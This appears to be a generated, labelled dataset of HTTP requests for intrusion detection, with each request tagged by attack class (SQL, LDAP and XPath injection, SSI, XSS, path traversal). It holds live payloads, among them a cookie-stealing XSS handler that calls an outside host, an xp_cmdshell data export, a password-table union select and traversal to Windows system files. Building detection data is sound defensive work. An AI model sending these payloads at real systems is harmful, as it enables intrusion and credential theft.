Warning: 547 www.iirwnee.tiff "beStC" "Tue, 20 Dec 05 19:05:57 UTC"
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46742
Start - Id: 40436
class: SSI
POST /enot8rteatodNaHe/osofsy/r4OCTMklhhaving/OIS.9XjjRLJYYx1.bin? HTTP/1.0
Content-Length: 328
Content-Language: ORcrroUr
Content-Encoding: compress
Content-Location: http://www.a5ettel.org/irxfest/eo3df.html
Content-MD5: dGFkbnd0YXd0ZWpvYTdzZQ==
Content-Type: application/x-www-form-urlencoded
Host: 215.52.50.13
Connection: keep-alive
Accept: text/*;q=0.2, text/xml;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Date: Fri, 16 Mar 07 23:48:44 CET
If-Unmodified-Since: Mon, 04 Oct 04 09:51:31 CET
If-None-Match: "HhHz_SkO_yuZLNjY"
If-Range: "uTygbm9-0WlZGH4Tp"
Max-Forwards: 974
MIME-Version: 1.1
Range: 6-639655,691634-6
Referer: http://www.atrlo.uk/Tcq1nKo/a4resA.gif
TE: trailers,chunked;q=0.6,trailers
User-Agent: Mozilla/3.9 (Machintosh; U; Mac OS X 5.7; ea-td; rv:4.2.3) Gecko/17796858
Via: 9.1 82.208.184.133, FTP/0.1 www.yseah.htm:3281
Warning: 892 254.116.244.65 "adeseoo" "Sat, 29 May 04 11:26:41 CET"

apfHsaxeihl=tsntenn0s\l g&3qwioerzauz=8360&aqdzgaEsyf=Hsareonbfbar&7perlen4RVgwMG=styleetaOsamM6eeee&DUboot.ini8LWVaDk=ty&7mcNxf9Cx29=55678&eshep0hbaUgtpyh=pek1kbe26ahrcanf&tohrt3fwneevh=<!--#include    virtual="d:\windows\autoexec.bat"-->&Tms=08768551&spt=4643232&sE8koannbt=2623760&rembR=snit6dnekAcl:n

End - Id: 40436
Start - Id: 39335
class: SSI
GET /k8rd18DRyp30el3o3fHo/sE8b/dwgdp3lai1tnnncsf9u/lTOjKrj6sYTWg/dxqyaP0wgQ/L6C/aqrat6isq60rqwtn/VF7tft489komtr/ohzcadlgrt/sehSiChtaS0r3JSLq3p9/lcHX@1N.png?6it=it%3DsahZ6qyr&loyU=302XjS&debT4aaa=7678664882&xfa=7465137487&ncd=Dql&9.telnetvB8gIi=38&7AWtr=%3C%21--%23email+fromhost%3D%22www.heSoyT.com%22+tohost%3D%22mailbox.qajt.com%22+message%3D%22hi73oe+hs6Bcru+Ey2ole+eg2atz%22+fromaddress%3D%22ovat.com%22+toaddress%3D%228on.og.com%22+subject%3D%22h%22+sender%3D%22alc.com%22+replyto%3D%22hhibujN.com%22+cc%3D%22rRs%22+inreplyto%3D%22lald+Nns+a%22+id%3D%22anrntmail%22+--%3E HTTP/1.0
Host: 64.57.29.108
Connection: close
Accept: application/*;q=0.6, text/html;q=0.6, audio/basic
Accept-Charset: x-mac-roman, iso-8859-1, utf-7, windows-1257;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 153.213.53.71
Cookie: LMJ0BN6htpassmV=h"@"n;uotthoe=gensnooSnxtermteE;r6miife=kpd;theaTizCkeyuL=a\metxtr2v;eUjennhm=6;pneentdi7lc=rm\u
Cookie2: $Version="998"
Date: Thu, 07 Apr 05 05:37:16 CET
ETag: W/"UfE2ce@UXAHx12IVp"
Expect: 100-continue
From: fiaotu@eNeFi.it
If-Modified-Since: Fri, 24 Dec 04 23:05:09 CET
If-Unmodified-Since: Wed, 02 Sep 09 11:15:43 UTC
If-Match: "7EHT5aqp_Ma3GG_VDrdm"
If-None-Match: *
If-Range: Sat, 29 May 04 03:58:58 UTC
Max-Forwards: 4882
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: Digest qop=auth-int
Range: 422767-,0924-,61697-47592
Referer: /Deaore/k4sesEdH/tnuoe.jpg
TE: deflate;q=0.1,gzip,chunked
Trailer: From
User-Agent: Mozilla/2.7 (compatible; MSIE 0.6; Unix; oztse1; ncsagMeTN; klndc)
UA-CPU: Sparc
UA-Disp: 607,126,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9132x248
Via: HTTP/0.3 www.rrmun.jpg, FTP/2.6 28.180.165.15, FTP/0.1 www.ztfIloH.html
Transfer-Encoding: compress
Upgrade: 5lnxa/4.9, sonsya/6.3
Warning: 122 198.92.122.224 "cPlo9eieliqfAlgpshdu" "Thu, 27 Aug 09 14:04:16 UTC"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 39335
Start - Id: 44872
class: PathTransversal
GET /dTilp1rat/oZO/ah/nOx/i.CQJJ84zHOFmL.png?endmmrdr=370787&r9irtR=2975165&achu=aeiee97n%3E&anrNaioe=doc%28+file%3A%2F%2F%2Fc%3A%2Fte%2F8mEnnc.xml%29&aniiot=89517114&eb=rdz2LM.9aSD7&iT71narphtnp58=5&ioebioihah=ero&eirhAnrubBm=-scriptchcro%5Cfr4&-TfFxwt=passwdptt0&rmtdz=binf+a&ldOyhi=a9s&ettAtnydtttden=jaboot.inieide&ixvzoBC=2280&mncgdTse=hkZV5 HTTP/1.0
Host: www.eemic.biz
Connection: neui7
Accept: */*
Accept-Charset: koi8, windows-1250, iso-8859-6;q=0.2
Accept-Encoding: deflate;q=0.1
Accept-Language: *;q=0.8
Cache-Control: max-age=04169
Client-ip: 32.25.74.7
Cookie: 55ctskeyg=djgn
Cookie2: $Version="6"
Date: Sat, 20 Jan 07 24:00:53 GMT
ETag: "1zhRIGqs9bhrirWiAR"
Expect: ritRee
From: crrs@n6en.net
If-Modified-Since: Fri, 15 Jan 10 15:58:51 GMT
If-Unmodified-Since: Thu, 30 Aug 07 14:33:50 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2139
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM bmhJZUFldG5uY2FVdGVFdXNlU1Zpb1llcUZ0bWRkQ0F0YWVlZml5Z2Vv
Authorization: NTLM Y2M4dGFpZWxGcWNlZnNvb3RvZWFnZGF3ZnJieW9ycm95aW1jaXM=
Range: -41,56231-,-8575
Referer: http://sieluher.cz/yaea2y/0afIT/fiactsi/tvas.sh
TE: gzip,trailers,trailers
Trailer: If-None-Match
User-Agent: gtwTuwyLfm http://www.0Nith.gov
UA-CPU: PowerPC
UA-Disp: 229,303,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 458x842
Via: FTP/1.4 www.amNbme.css, 4.0 44.78.128.66, 7.3 168.252.65.116
Transfer-Encoding: gzip
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 279429
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44872
Start - Id: 49566
class: XPathInjection
GET /wUCWswJjihtacces8F.gif?kto=lE1dULrPrf-F&iI.YvarJXlOQ=yyH0c9g&rt=hlpshgeeau6Hrw&FAiNE=i8HVL7ew&etcvRQinsertQ6autoexec7null8=erntjtdn&syq=5723&PUM@9VdJMr7=wp-nhnt1oiEsh+&s81KyqK=cEr%2Fedndll&ae=e7lcwf&eawi9Ees=ubcpo%27%5D+++++%7C+++P+++%7C+++%2F%2Fuser%5B++name%2Ftext%28+++%29++++%3D++++%27enht4&tda43tnn7onnv=%5D-ai%5CMapositionmeta&niotaasuefE=rhwmperlih HTTP/1.1
Host: 128.163.53.47
Connection: close
Accept: image/*, text/html, image/png
Accept-Charset: x-mac-cyrillic;q=0.8, x-mac-turkish
Accept-Encoding: 
Accept-Language: vTKy-w, am-dtr;q=0.0, vdrco2ii-uyctCr
Cache-Control: max-stale=5
Client-ip: 229.72.228.0
Cookie: NshutdownZhP=8562;Fttr6eh1wlw2iI=991065
Cookie2: $Version="6"
Date: Tue, 20 Feb 07 09:21:38 GMT
ETag: "1XNKuhfoY0xpvjB27"
Expect: rai8lT=iouvqGee;fouiTcye=n37l
From: rZ7t1wz@obusg.st
If-Modified-Since: Mon, 19 Sep 05 17:29:16 UTC
If-Unmodified-Since: Wed, 30 Nov 05 24:18:47 CET
If-Match: "lpF8capJ.Z..ZT57N"
If-None-Match: *
If-Range: Thu, 18 Feb 10 07:32:10 UTC
Max-Forwards: 275
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: eeftuo sfagt=srres
Authorization: Digest realm
Range: -351866,-996363,00-
Referer: http://www.av6Syq9.be/awct9/dwtj.js
TE: trailers
Trailer: Range
User-Agent: Mozilla/5.0 (Windows; U; WinNT 9.0; ev-Ss; rv:3.9.0) Gecko/75007059
UA-CPU: Sparc
UA-Disp: 979,7479,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9192x115
Via: eso/3.0 154.226.69.16, HTTP/8.8 www.ypltEa.jpeg
Transfer-Encoding: gzip
Upgrade: opGee/0.6, iij/9.1, thIez/8.7
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 4750592519886658439
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49566
Start - Id: 44845
class: PathTransversal
GET /iwitPSaUeaeto/eoea7Aaxhpeoe/5ooQWgWTq/SozC.sh?cksa6mptn=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F&EyrwtohwewstY=t7i0kgeBSblV&3atiui=wJD3e&saabi11rfte1rw=eB&emetnfrsgt=+D HTTP/1.0
Host: 115.157.224.78
Connection: close
Accept: video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.9, deflate;q=0.8, identity
Accept-Language: otaaetkT-sssnq;q=0.2, ynobd-szn, PlteAe-gjsfut;q=0.5
Cache-Control: no-store
Client-ip: 55.4.250.85
Cookie: eo5he=<7l5hs;gteo8ia3EkesAoc=|@ei[;_8documentKBUFfQN=926943;oehssoolA8iuioo=ox6N_E7X
Cookie2: $Version="393"
Date: Mon, 22 Mar 04 07:04:25 GMT
ETag: W/"b_5jV2f9CFXueFMht3"
Expect: 100-continue
From: hohEtsbm@c8e2atu1l.be
If-Modified-Since: Thu, 04 Nov 04 12:22:26 UTC
If-Unmodified-Since: Mon, 02 Jul 07 16:23:38 CET
If-Match: *
If-None-Match: "8spgIl6Vt8rYwmzm"
If-Range: "59YZaA4Zh71NTrN"
Max-Forwards: 87
MIME-Version: 8.7
Pragma: nmb1l=wewhttdc
Proxy-Authorization: Basic MG5lZXNrc3Q6Zmtab3ZsczE=
Authorization: iYti dnel1=iitt
Range: 776321-,6-
Referer: /masm/mir0q.ace
TE: gzip;q=0.2,trailers
Trailer: From
User-Agent: Mozilla/2.8 (X11; U; Unix 4.4; jq-of; rv:9.5.8) Gecko/22596387
UA-CPU: StrongARM
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 035x248
Via: FTP/2.1 25.184.223.254, HTTP/6.5 246.162.171.251
Transfer-Encoding: ovhne
Upgrade: elir/9.8, ylr/3.8, e0ge7/5.0, Son/5.8, deHi3/3.2
Warning: 218 47.103.166.198 "iok3ehde4ryOr" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 65016581
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44845
Start - Id: 46941
class: XSS
PUT /oKVVNNjcNRobvUui6a/b8.U/tl0zVftunestpri9/3uzchttpslhHGHP4/acs6tnshirpaRp/iEggXWS/ii/4rVgVdYcbEtRkY/ene/Gharmfisnm5ca/eElU/n7B1fo.J0VB.htm? HTTP/1.0
Content-Length: 302
Content-Language: ea
Content-Encoding: gzip
Content-Location: /hirq/rjlpMlev/ettE9t/laGis/Excrr.mdb
Content-MD5: ZWVFb05udGlUbWlnbXd5ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 May 09 16:34:30 CET
Last-Modified: Mon, 24 Oct 05 03:45:25 CET
Host: www.jnt5xc5rh.org
Connection: close
Accept: application/*, text/*
Accept-Charset: utf-7, euc-kr;q=0.5, iso-8859-1;q=0.8, x-mac-japanese, euc-jp;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 193.249.16.142
Cookie2: $Version="051"
Date: Tue, 02 Nov 04 04:02:56 UTC
ETag: "2QUjnUW_IVja0L.6aDN"
Expect: ocr3E
If-Modified-Since: Tue, 28 Jun 05 17:44:07 CET
If-Unmodified-Since: Sun, 11 Oct 09 03:50:55 CET
If-Range: Sun, 03 Dec 06 16:27:16 GMT
Max-Forwards: 8
MIME-Version: 9.2
Pragma: no-cache
Range: 16111-
Referer: /hutmmht/llnra4/qexNe/i9dya/Behzt.pdf
TE: gzip;q=0.1,trailers,trailers
User-Agent: I3tq (eWKFDx; yPU0M7EBw; ur5xoY2sa; 26.DXZG83_; tndao4)
Via: HTTP/5.6 147.164.252.189, 5.6 248.160.75.47

K1olq=  rhgme g1\)[&n72St8dctsh=246676&tdlradaiew=0161216&rwpiinaimqsern8=GpEiElpcntneyf&xie4onnkmeGLto=6&hnrBjlhrdue=<div     onmouseover  ="   [document.location.replace    ('http://www.taelatit.com/cgi-bin/ininro.cgi'+document.cookie);]    ">&4lYx9zBSoWS=ai

End - Id: 46941
Start - Id: 41853
class: SqlInjection
GET /le0Safbreoftesiele/np@IJi6Uyi5f/s6teawes.js?ditB=nrEf0eraccess_logw&IXbP4ex=138&KZ25LN3=idso4si&yi=%27+++++OR++%27wkaesont%27++++LIKE++++%27aze%2525&mdopaDeterhatr=hyw3oo HTTP/1.0
Host: 51.60.244.20
Connection: vcywWo
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: n8Oea-nelgh;q=0.7
Cache-Control: only-if-cached
Client-ip: 78.57.136.131
Cookie: uhtpRHir=yswi]isr;iAsz9iBotptniwe=1eucfo9gitia;EWosi3ny6nZ=e7-E6Ztckz;noHh7cb8ctqa=58889;uttm8iihO=icTV1H
Cookie2: $Version="7"
Date: Wed, 20 May 09 14:18:48 CET
ETag: "a2V9IycN6MWKRF29Nv"
Expect: 100-continue
From: dupNd@t1Lces4e.com
If-Modified-Since: Sun, 02 Nov 08 11:10:20 GMT
If-Unmodified-Since: Mon, 01 Sep 08 01:35:42 CET
If-Match: "gT0G4_yBX14P2Wp2eGA"
If-None-Match: *
If-Range: Thu, 18 May 06 24:27:09 CET
Max-Forwards: 3776
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: xnD4ee qpwiaF=eesD
Authorization: NTLM bnNpZXRJb3Nzd29lb3dhZHNlaGZNT0FpYWFNbm5jYkx0ZG5ydGV6MHN5cGM=
Range: -521,-331719
Referer: http://IexSa.it/kihsp.gz
TE: gzip;q=0.5,trailers
Trailer: Expect
User-Agent: lEJgOQDHMn http://www.lem7te.uk
UA-CPU: PowerPC
UA-Disp: 7520,1896,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/8.6 75.221.6.220, FTP/2.7 180.144.40.176
Transfer-Encoding: deflate
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 658 www.ease.shtml "qhnna" 
X-Forwarded-For: 207.107.185.169
X-Serial-Number: 10397953831192510
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41853
Start - Id: 42665
class: SqlInjection
GET /iieKk9nrnps9i/euen5nnscso.jsp?b0imtex=9798&nRUKu6l=cIu0bI2&rheesglzs=rwVCu2O&shatdh=%27union+++select+PASSWORD++from++DBA_PASSWORD%3B--&Qduran1Eoh=aetnrktesn&mczlgdoaoijnh=381529&qitPhohvbl=a%26%3Bsdis3Na%2BF5a%3Fs HTTP/1.0
Host: 47.239.186.109
Connection: zmksens
Accept: application/*;q=0.8
Accept-Charset: *
Accept-Encoding: identity;q=0.7, identity;q=0.2, deflate;q=0.9, deflate
Accept-Language: *;q=0.5
Cache-Control: ycY='cehdis'
Cookie: nO=)hh
Cookie2: $Version="1"
Date: Sun, 04 Nov 07 15:03:39 CET
ETag: "UTEjZjyD5vhfh1LcHI@"
Expect: 100-continue
If-Modified-Since: Wed, 03 Sep 08 22:08:14 UTC
If-Unmodified-Since: Tue, 21 Sep 04 15:36:48 CET
If-Match: *
If-None-Match: "fDqJA1m8kiyP_FwVEo"
Max-Forwards: 0
MIME-Version: 8.1
Pragma: c1=neiin
Proxy-Authorization: Basic eWFlckVMOnI3NHRu
Authorization: NTLM YWxydWlmM2lpZTk4c295b2VvdGVhZ2Vuc24zNGNpaWVpbHRpamllTG9HcXJl
Referer: http://www.cnya.de/oaa8snCo.pl
TE: chunked;q=0.8,deflate;q=0.0
User-Agent: Mozilla/5.8 (X11; U; Linux i586 6.2; oc-nr; rv:0.5.9) Gecko/16120577
UA-OS: WinNT
UA-Color: color32
Via: FTP/1.1 www.htooeaho.html
Transfer-Encoding: ceosom
Upgrade: eeog/2.4, mitts/3.0, e6e3i/4.3, oaelt/5.7, heNtCn/4.2
Warning: 783 www.chvaonf.html "Tvnj8wlTdlch3nhl" "Mon, 08 Mar 04 04:17:40 CET"
X-Serial-Number: 328822
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42665
Start - Id: 41109
class: SqlInjection
GET /u7qbBqd.LQ1LYBy/ee/veasy/bVD.VDlrHUNDBDcPbOR/Tstdind.9p_Mz/erk6Ii0eZ92jsrNllb5a/dadteaoilslnutn/cHz.vZik5g.tiff?dhf=cs%7C7&Axp_XopenTVGz=laiohp&iRdlnwehaoo=R%3Ftmn&EwesoovnndaeiSi=ioTedtoWtotlHf&liurnlziwhgde=Hno+e&heu=gb9ecdropFw%7Ce++meyaP&LvWvY_H=+m0p&nniRG0y@fO=exec++++xp_cmdshell+++++%27bcp++%22select+++*+++from+++eK%22++++queryout++++pwdump.exe++-c+++-Craw++-Shackersip++++-Usa+++++-Ph8ck3r%27&nhds8rAitlntlh=2000&ahi=aPyuF4N4Zv HTTP/1.0
Host: www.iori.st
Connection: keep-alive
Accept: audio/*, audio/*
Accept-Charset: *;q=0.4
Accept-Encoding: deflate, compress
Accept-Language: iee3lO3-ifoyze, iatR-oooOise, onst7-nhrss
Cache-Control: mnzW='aH3m2Iep'
Client-ip: 138.207.253.14
Cookie: ho=32;sduip=huupdtpi
Cookie2: $Version="183"
Date: Mon, 03 Sep 07 24:01:47 CET
ETag: "08c.BwX7mSH8DfY"
Expect: iCconail
From: ljbnc@t4tt.net
If-Modified-Since: Fri, 05 Nov 04 20:47:13 CET
If-Unmodified-Since: Tue, 21 Nov 06 23:51:28 CET
If-Match: *
If-None-Match: *
If-Range: "Ggq11yjwKPT7am@PB"
Max-Forwards: 3919
MIME-Version: 5.4
Pragma: Hs94aeif='eh'
Proxy-Authorization: Digest opaque="sqsll"
Authorization: NTLM YWVyZW91YWVwbW9Ub250b3RpOWZodHNkb2RyZWk3czN3YWExY21hRmVOYWJO
Range: -397
Referer: /hrlo/Tssro.gif
TE: gzip
Trailer: Accept-Language
User-Agent: Mozilla/1.1 (Windows; U; Win 9x 7.6; oe-fz; rv:6.6.7) Gecko/28663923
UA-CPU: Sparc
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/6.8 237.8.7.43
Transfer-Encoding: matoan; jymwutb=eigrn
Upgrade: s3t/0.2, css/4.1
Warning: 323 www.l1Er.tiff "djhflegmslO" "Thu, 15 Apr 04 02:45:31 UTC"
X-Forwarded-For: 50.70.237.114
X-Serial-Number: 54708069609443708
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41109
Start - Id: 45980
class: PathTransversal
PUT /e8n/mmlalortmnrs/JH5guHq@cb30/aservicesZnetcatW/Ycedes.gif? HTTP/1.1
Content-Length: 261
Content-Language: dvb,ttbsn,eAfe
Content-Encoding: deflate
Content-Location: /t4Ia/dertl/frGqHpgm/uoBi2t/iaei.doc
Content-MD5: SnRvcnVqZWl0ZWhhYW5uaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Jan 06 21:26:07 GMT
Last-Modified: Tue, 02 Feb 10 06:14:31 UTC
Host: www.lmtu.be:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-2022-kr;q=0.4, euc-tw;q=0.6, iso-8859-3, euc-jp;q=0.4, koi8
Accept-Encoding: gzip, deflate, deflate
Accept-Language: ../../../WINNT/autoexec.bat
Cache-Control: only-if-cached
Client-ip: 121.84.201.116
Cookie: nkth=l3opttwead$1ua;salhzhtthnM9s=7082503837;egeaa=3756662862;rordtsHpN2idua4=9908;ravRmIwaoUptCC=processing-instructioneg&&;phguhtdl=yinsertLsce'etas:asun
Cookie2: $Version="1"
Date: Tue, 09 Feb 10 12:15:09 UTC
ETag: W/"hfrms3FDNZktwdG2Zu8"
Expect: 6tcdao4o
From: lapnn@rne0nheDa.de
If-Modified-Since: Mon, 23 Feb 04 22:25:59 CET
If-Unmodified-Since: Fri, 25 Nov 05 18:09:07 GMT
If-Match: *
If-None-Match: "gq1jk6iM6wHAh5Gh0Jvh"
If-Range: Fri, 29 Jun 07 14:31:50 GMT
Max-Forwards: 536
MIME-Version: 4.8
Pragma: osh='de4'
Proxy-Authorization: Digest opaque="ewfhetpt"
Authorization: NTLM ZXNydGxuZWR5dHVuZUpjdGNpQTFuaXRlcEhEMW9yazlxNW5zcWF0eWFsYW5ucGx0
Range: 1614-89,75-
Referer: /rtpd/saeetk/eairt/pieaa/Auyhslrc.jpeg
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: rotberbi/8.6.2.0.0
UA-CPU: StrongARM
UA-Disp: 548,5164,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 548x253
Via: 1.6 43.115.114.60, HTTP/2.5 www.wdn09.gif:6303, 6.2 244.11.133.107:304
Transfer-Encoding: gzip
Upgrade: aecn/5.8, CMno/3.6, r4lre/4.3
Warning: 392 248.155.194.89 "olpeyotcyYya" "Sun, 14 Aug 05 03:35:30 UTC"
X-Forwarded-For: 87.224.179.54
X-Serial-Number: 466621533909615
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

vau83aseDs2awA=836216&ou5eissmb=151&o7@S=bKDlmTz&dropjlBg=nodeRuRzrdrexecmx&3ozbody=l&si=55303937&oiosnsApg=menaasIoesxet7y&Tyvm0CrijegmlUq=orsunt9sauhvLOeb&umgtbae=Sq&rfeiechi8orii=asRp document&pg=apliblusrieehdnu8a-rEe&rtned=t6esxh?rs0&mtaknaIfastoa=633204

End - Id: 45980
Start - Id: 45616
class: PathTransversal
GET /hIekdjnRfhynpts/yqe/xYE7XqmOAfnX4tP/PQ38w2AY/yo25JslG-WtVnU19UD/sboo31sisnd10cTol.jsp?oweeOifese=340&uu@Zexec3_A3drop1U=semCKejhb&tst28nrbrtr=%3Biw&t4bn=6717512867&s8DSnbvhT=t&lsi5AUsO__SV=tig3metaextermtUhGoNceo+e&os=x%3Freenetcateiher%5Csnssr&iigt=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.1
Host: 120.161.69.162
Connection: EfioC
Accept: */*;q=0.2
Accept-Charset: iso-8859-1;q=0.8, koi8-r, isiri-3342;q=0.7, hz-gb-2312;q=0.6, x-mac-arabic
Accept-Encoding: 
Accept-Language: andeze-enn;q=0.5, eh-i3i6boi, fe9aSwl-a3m;q=0.2, c-pmhfh
Cache-Control: rwem='neau'
Client-ip: 54.187.183.145
Cookie: xt5AZH3AcVD=45061020;esiugtui=069447829;McSR.KrhtpasskEKv=202348
Cookie2: $Version="41"
Date: Fri, 14 May 04 05:38:01 GMT
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: 100-continue
From: aieelt@lnoh1ttGc.st
If-Modified-Since: Thu, 08 Apr 10 03:22:33 CET
If-Unmodified-Since: Thu, 26 Apr 07 22:21:28 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 4.5
Pragma: wia='eLi8'
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Digest opaque="erutn"
Range: 942-,71595-5
Referer: http://www.zoozte6s.ch/atF17nt/neOmeet/krmYxe/gsoUltt/i9sHnnmy.css
TE: deflate;q=0.2,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.3 (Windows; U; Win98 8.8; ld-hi; rv:1.2.4) Gecko/92201087
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: FTP/3.1 www.epolm.html
Transfer-Encoding: eiSs
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45616
Start - Id: 35093
class: SqlInjection
GET /a0Dgb/V1AM8.includeexecD01M.php4?nshh3rcemoo=e&eeaoOemaa7=segsjIsclte&etuas=045&T9httpsOs7.JwNQ=tlumAmne&wPG.75R=+uog9&v3_X25PaOMh=tozy2n3ekpldle2o&setsaadpHhi=8117745&.J7bUchildOSOLselect=oK_Mc5&qz6CQu=ntAs&eatt7eQsp=aslin+4s&Wyt=109&itghnEnpt9l8yod=etropt%3Celikemobg9&usy=dqigRn%3Der&al=uoa1%2FsT+replaceydn&edsi8s0we=92835 HTTP/1.0
Host: www.o4mAi4st.com
Connection: l2ath
Accept: video/*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: compress, gzip;q=0.4, gzip;q=0.4
Date: Tue, 19 Aug 08 21:52:17 GMT
ETag: "wZJvm4nXlSv4uA6NrLwI"
If-Match: "7s.aPxFpz4qHprzYQX1"
If-None-Match: "R.5vzEev_3N@.R098edh"
Max-Forwards: 5
Pragma: no-cache
Authorization: Digest cnonce="nZsa"
Referer: /pe3fSef2.asmx
User-Agent: '  OR   'i7qeaqoaes'     LIKE     'aze%25
X-Serial-Number: 62843
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35093
Start - Id: 38972
class: LdapInjection
GET /jDU@Wautoexecr/ekUfDz6Q/attwe5iotio6/ncaeTtsedhblone/mu6d3FPXpB.pl?l3betweenF=dndii2igroup+byp&dwheiapuldliw=2drnlhNed%3Ah&beh4rtgelr=1828141&eaudnensd=d4&Fehhdagao6dga=as&4enatiaore=92667283&toYej=s&oalis=97124657&ttgOtlvkR=%29+%28+%7C%28uesa%3Dvny*%29&lb=9ao1eu&sldlhed1xv6=risatwenAto HTTP/1.0
Host: 54.85.100.228
Connection: keep-alive
Accept: text/xml;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: identity, gzip, deflate;q=0.3, deflate, identity
Accept-Language: *;q=0.7
Date: Tue, 19 Oct 04 05:14:35 CET
If-Modified-Since: Sat, 24 Feb 07 06:14:28 GMT
If-Unmodified-Since: Fri, 23 Jan 09 15:37:55 GMT
If-Match: "Whtl8p8BnQEz5VZBxEwZ"
Max-Forwards: 8
Pragma: no-cache
Authorization: NTLM c2VzcGViZWRscmllaWdiZW1hZ2R6cmdpc2VrZHR3c25lbm5ucmFp
Range: 4-376,4029-
Referer: http://www.inLZebN.fr/ndgr/tushzpj/53f2st.mp3
User-Agent: reparsaJiRrncs2tayr
Via: dis/0.0 195.217.62.241
Upgrade: densbt/0.0, UOwo/3.9, ciyntc/3.0, tneod/0.5, rcsker/3.3

null

End - Id: 38972
Start - Id: 37468
class: LdapInjection
GET /eHVAQCzv_IGb0vO59PGx/aPLm27n/ahnaoleamsnowsf.jpeg?gi0nfi3awuoslet=4&tlayostnpdclhw8=2348212&Mv7YOdt=7814&hw=tol&hdEtchiu=echoo&imetyen=6626992337&mrc9=eSoAX&eotanmd=iMrattfei3t&hr70eepruASs9f=zan&tD=4htiytj1oo&ogse4tZhoeJo=aOeomtinsertsedernhtiin&ptt=emkiumsEd6C&naeigi5rse=6VJ&HyX6Vadmin=15&ahnklCfm=8890503 HTTP/1.0
Host: www.1Oglwgoa.cz
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: lfaNh-caar;q=0.1
Cache-Control: max-age=6347
Client-ip: 97.241.16.223
Cookie: tnseyecy=SszROawrici;hsokan3amnty=nugi)(&(objectClass=imai*);a9rA7csoEkes=1403;eahn=vbslcNaps5tt
Cookie2: $Version="18"
Date: Sun, 14 Aug 05 24:38:22 UTC
ETag: W/"Rx1yNWkgNsdRgrRXheAB"
Expect: xeilyu=t8r8Bikn;huTb=yonIs
From: 7EAiyd@ttlgtqrt.st
If-Modified-Since: Fri, 22 May 09 19:48:55 CET
If-Unmodified-Since: Thu, 11 Jun 09 15:19:26 CET
If-Match: *
If-None-Match: "R4-7vunUtGatLwaHl"
If-Range: "EiOOwT1oZZOKuTUVHZRO"
Max-Forwards: 8
Pragma: no-cache
Authorization: Digest opaque="eynl"
Range: 2-927066
Referer: http://www.oTd9v.ch/goetJf.pl
TE: deflate,trailers,chunked
Trailer: If-Modified-Since
